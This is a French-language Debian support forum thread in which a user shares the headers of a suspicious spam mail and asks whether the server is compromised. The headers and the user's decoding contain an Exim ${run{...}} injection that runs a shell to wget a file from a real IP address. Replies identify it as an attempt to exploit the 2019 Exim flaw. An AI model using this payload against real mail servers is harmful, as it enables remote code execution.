Mail suspect

Support Debian
,
Tags: #<Tag:0x00007f63e36f0880> #<Tag:0x00007f63e36f0768>
#1

Bonjour,

J’ai reçu un mail très bizarre ce mail qui a été classé en spam d’ailleurs :

Return-Path: SRS0=+aha=UZ=njt.com=root@mondomain.fr
Delivered-To: monmail+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mondomain.fr
Received: from njt.com (us-east1b.itmerri.com [138.68.7.199])
by mondomain.fr (Postfix) with SMTP id C96EF1601BE
for root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@mondomain.fr; Wed, 26 Jun 2019 02:19:37 +0200 (CEST)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31
X-Spam: Yes

Dans Thunderbird, le mail est vide. Le mail semble contenir une commande qui télécharge un fichier et le lance :

${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}

En clair, ça donne ça ?

run{/bin/sht-ct’wget 65.181.120.163/stfinracu’}

J’ai essayé de télécharger le fichier 65.181.120.163/stfinracu mais j’ai une erreur 404.

Qu’en pensez-vous ? Dois-je réinstaller mon serveur ?

#2

J’ai fais un test en remplaçant l’ip par l’ip d’autre serveur.
Le fichier ne se télécharge pas.

#3

Ton serveur ne risque rien.

Par contre n’essaye pas de télécharger / exécuter ce fichier si tu n’es pas dans un environnement que tu contrôles totalement, il s’agit clairement de quelque chose de peu sympathique.

À la réflexion le-dit fichier n’existe peut-être même pas. Il s’agit peut être simplement d’une technique permettant de tester si on peut faire exécuter arbitrairement des commandes à ton système.

#4

Ce ne serait pas une tentative d’exploitation de la récente faille d’exim4 ?
https://www.debian.org/security/2019/dsa-4456

1 J'aime
#5

Oui je pense que c’est une tentative d’exploitation de la faille d’exim4. Mais comme j’utilise Postfix, il n’y a aucun risque.

Merci à vous 2 !

#6

J’ai eu la même situation sur l’un de mes serveurs, et j’étais tombé sur cette discussion qui semble confirmer cette hypothèse : https://security.stackexchange.com/questions/212077/unusual-mail-headers-show-evidence-of-mta-attack-have-i-been-pwned